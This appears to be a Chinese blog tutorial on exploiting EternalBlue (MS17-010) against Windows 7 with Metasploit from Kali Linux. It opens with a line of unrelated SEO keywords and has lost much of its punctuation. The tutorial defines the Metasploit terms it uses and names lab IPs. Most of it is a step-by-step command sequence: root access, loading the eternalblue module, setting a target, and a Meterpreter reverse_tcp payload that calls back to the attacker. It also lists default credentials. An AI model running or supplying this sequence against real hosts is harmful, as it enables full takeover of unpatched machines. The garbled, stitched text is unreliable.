网站logo设计理念,上饶有哪些做网站的公司,软件开发工程师证书有用吗,站群管理软件一、kali默认账户和密码都为kali 攻击机#xff1a;Linux 的 kali 目标机#xff1a;Windows7 x64 二、kali、metasploit、metasploit 攻击 windows操作系统、metasploit 攻击 永恒之蓝 全流程
①kali#xff1a;是黑客攻击机。开源免费的Linux操作系统#xff0c;含有300…一、kali默认账户和密码都为kali 攻击机Linux 的 kali 目标机Windows7 x64 二、kali、metasploit、metasploit 攻击 windows操作系统、metasploit 攻击 永恒之蓝 全流程
①kali是黑客攻击机。开源免费的Linux操作系统含有300渗透测试工具、Git树集成了600黑客工具。
②metasploitkali最强渗透工具。开源安全漏洞利用和测试工具集成了各种平台上常见的溢出漏洞和流行的shellcode并持续更新。让复杂的漏洞攻击流程变简单。
③metasploit 攻击 windows操作系统如永恒之蓝漏洞利用windows操作系统的SMB漏洞可以获取系统最高权限端口为445。接着不法分子改造“永恒之蓝”制作了wannacry勒索病毒被勒索支付高额赎金才能解密恢复文件。
④metasploit 攻击 永恒之蓝 全流程
1使用模块use exploit/windows/smb/ms17_010_eternalblue
2设置必选项
查看必选项required 为yes的就是必选项show options 注
搜索永恒之蓝漏洞search ms17_010
使用模块use模块名或编号
只需要配置必选项即可。
端口有1-65535个随意选择只要端口未被占用便可以使用。
可以自己搭建虚拟机去攻击。 三、启动metaspolit进入msf命令行
①打开kali终端
②切换至root用户使用命令sudo su输入kali的密码kali
③初始化metaspolit数据库使用命令msfdb init
④启动metaspolit进入msf命令行使用命令msfconsole 注
console命令行接口
msfmetaspolit frame
exploit攻击脚本准备攻击火箭
payload攻击载荷攻击过程中进行的操作火箭搭载的卫星
meterpreter攻击过程中获取的权限开发者命名metaspolit后渗透的神器
description描述
IP地址计算机在互联网中的唯一标识地址
target hostrhostsRHOSTS目标地址加s因为一个攻击机可以攻击多个目标机
target portrport目标的端口永恒之蓝漏洞的默认端口445
listen addresslhostLPORT监听地址攻击机的地址
listen portlport监听端口攻击机的端口
命令行不区分大小写。 四、攻击另一台主机的流程
①搭建虚拟机环境命令行cmd输入ipconfig获取目标的IP地址。
②在攻击机的终端攻击目标地址使用命令set RHOSTS 具体目标地址或网段
例如
具体目标地址为192.168.195.130
网段为192.168.1.0-254
③【可不做】查看必选项required 为yes的就是必选项show options
④攻击后获取meterpreter使用命令set payload windows/x64/meterpreter/reverse_tcp
⑤设置kali的IP地址使用命令set LHOST kali的IP地址
先查看kali的IP地址ifconfig的inet 192.168.195.129
⑥设置监听端口使用命令set LPORT 端口号
⑦运行模块使用命令run 注
通用命令
windows查看IP地址config 或 ipconfig 或 config -a linux
查看IP地址ifconfig
帮助help
查看选项show options
退出到上一级exit
清屏clear
输入密码的时候不显示自动读取键盘。 用户名密码dwq 总结
①sudo su
②kali
③msfconsole
④use exploit/windows/smb/ms17_010_eternalblue
⑤set RHOSTS 192.168.195.130
⑥set payload windows/x64/meterpreter/reverse_tcp
⑦set LHOST 192.168.195.129
⑧set LPORT 10000
⑨run